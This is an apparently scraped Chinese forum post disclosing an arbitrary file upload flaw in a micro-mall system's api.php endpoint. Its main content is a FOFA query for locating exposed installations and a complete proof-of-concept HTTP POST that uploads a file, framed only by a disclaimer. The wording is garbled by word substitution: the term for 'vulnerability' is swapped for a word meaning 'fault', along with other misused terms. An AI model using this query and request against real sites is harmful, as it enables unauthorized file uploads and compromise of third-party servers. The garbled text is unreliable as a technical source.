IT评测·应用市场-qidao123.com

标题: 微商城系统api.php接口存在任意文件上传毛病 [打印本页]

作者: 傲渊山岳    时间: 2024-8-27 21:48
标题: 微商城系统api.php接口存在任意文件上传毛病
免责声明:请勿利用文章内的相关技能从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的结果及丧失,均由利用者本人负责,所产生的一切不良结果与文章作者无关。该文章仅供学习用途利用。
1. 微商城系统简介



2.毛病描述

微商城系统api.php接口存在任意文件上传毛病
3.fofa查询语句1

  1. body="/Mao_Public/js/jquery-2.1.1.min.js"
复制代码
4.毛病复现

毛病链接:http://xx.xx.xx.xx/api/api.php?mod=upload&type=1
  1. POST /api/api.php?mod=upload&type=1 HTTP/1.1
  2. Host: xx.xx.xx.xx
  3. User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
  4. Accept-Encoding: gzip, deflate
  5. Accept:*/*
  6. Connection: close
  7. Content-Length: 274
  8. Content-Type: multipart/form-data; boundary=ec3af73200618d8ba86bb2e42d4ec594
  9. --ec3af73200618d8ba86bb2e42d4ec594
  10. Content-Disposition: form-data; name="file"; filename="271857.txt"
  11. Content-Type: image/png
  12. 792416340464
  13. --ec3af73200618d8ba86bb2e42d4ec594
  14. Content-Disposition: form-data; name="param"
  15. param
  16. --ec3af73200618d8ba86bb2e42d4ec594--
复制代码

 


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 IT评测·应用市场-qidao123.com (https://dis.qidao123.com/) Powered by Discuz! X3.4